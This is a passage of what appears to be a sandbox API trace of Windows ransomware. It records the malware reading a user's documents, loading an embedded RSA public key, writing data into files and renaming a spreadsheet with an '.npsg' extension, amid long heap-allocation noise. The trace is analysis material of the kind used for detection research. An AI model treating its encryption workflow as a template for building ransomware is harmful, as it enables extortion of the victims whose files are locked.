[0245.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0245.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0245.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89060 | out: hHeap=0x620000) returned 1 [0245.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bc90 [0245.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890a8 | out: hHeap=0x620000) returned 1 [0245.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0245.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0245.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0245.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0245.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0245.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89090 | out: hHeap=0x620000) returned 1 [0245.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0245.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0245.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0245.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89048 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89018 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7290 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0245.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0245.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0245.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0245.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0245.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0245.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0245.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0245.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0245.043] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0xc16a, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0xc16a, lpOverlapped=0x0) returned 1 [0245.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0245.043] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xc16f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.043] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0245.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0245.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0245.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0245.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0245.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b8ccd0 [0245.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0245.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0245.044] WriteFile (in: hFile=0x644, lpBuffer=0x3b8ccd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b8ccd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0245.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.044] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0245.044] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0245.044] CloseHandle (hObject=0x644) returned 1 [0245.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bce8 [0245.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e0) returned 0x3b8ccd0 [0245.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bce8 | out: hHeap=0x620000) returned 1 [0245.730] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\RSJMtQYrJ UaRLEty.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\rsjmtqyrj uarlety.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\RSJMtQYrJ UaRLEty.xlsx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\rsjmtqyrj uarlety.xlsx.npsg")) returned 1 [0245.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.731] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0245.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0245.732] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cd3a040, ftCreationTime.dwHighDateTime=0x1d5ba81, ftLastAccessTime.dwLowDateTime=0x9c4a8e0, ftLastAccessTime.dwHighDateTime=0x1d5b5bc, ftLastWriteTime.dwLowDateTime=0x9c4a8e0, ftLastWriteTime.dwHighDateTime=0x1d5b5bc, nFileSizeHigh=0x0, nFileSizeLow=0x3a7e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SGtgvmwElf ijI0mL.odp", cAlternateFileName="SGTGVM~1.ODP")) returned 1 [0245.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0245.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x106) returned 0x3b7b948 [0245.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0245.732] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\SGtgvmwElf ijI0mL.odp") returned=".odp" [0245.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\SGtgvmwElf ijI0mL.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\sgtgvmwelf iji0ml.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0245.733] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=14974) returned 1 [0245.733] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0245.739] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x3a58, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.739] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0245.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0245.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.742] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0245.742] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x3a7e, lpOverlapped=0x0) returned 1 [0245.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0245.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0245.743] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0245.744] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0245.745] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0245.745] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0245.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0245.745] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0245.745] GetLastError () returned 0x0 [0245.745] CryptDestroyHash (hHash=0x33f0488) returned 1 [0245.745] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0245.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0245.745] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0245.745] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0245.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.746] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0245.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3a80) returned 0x3b99d50 [0245.746] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0245.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7290 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fd0 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7a70 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89018 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89000 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89048 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fe8 [0245.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0245.747] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ccd0 [0245.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0245.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0245.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89048 | out: hHeap=0x620000) returned 1 [0245.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0245.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89048 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fe8 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b89000 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8660 [0245.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0245.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0245.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0245.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0245.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89000 | out: hHeap=0x620000) returned 1 [0245.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0245.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0245.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89048 | out: hHeap=0x620000) returned 1 [0245.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0245.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0245.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0245.748] GetCurrentThreadId () returned 0x5b4 [0245.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0245.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8a5e8 [0245.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0245.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0245.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0245.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0245.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0245.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0245.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.748] GetCurrentThreadId () returned 0x5b4 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0245.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0245.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0245.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89048 [0245.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0245.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89000 [0245.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0245.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fe8 [0245.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0245.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89090 [0245.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0245.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b890a8 [0245.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: 